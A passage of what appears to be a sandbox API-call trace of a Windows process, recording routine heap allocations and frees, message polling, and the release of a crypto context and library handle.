dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0268.152] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0268.152] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.152] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0268.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.152] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.152] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0268.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.153] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0268.153] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0268.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.153] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.153] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.153] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0268.153] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0268.153] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0268.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.153] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.153] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.154] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.154] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.154] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.154] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.154] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.154] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.154] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.155] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.155] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0268.155] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0268.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.155] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.155] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.156] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0268.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0268.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.156] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0268.158] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0268.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.158] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0268.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.158] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.158] FreeLibrary (hLibModule=0x756e0000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.158] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.158] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.159] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0268.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0268.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0268.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.159] CloseHandle (hObject=0x2a0) returned 1 [0268.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0268.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0268.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.162] CloseHandle (hObject=0x2d0) returned 1 [0268.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0268.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 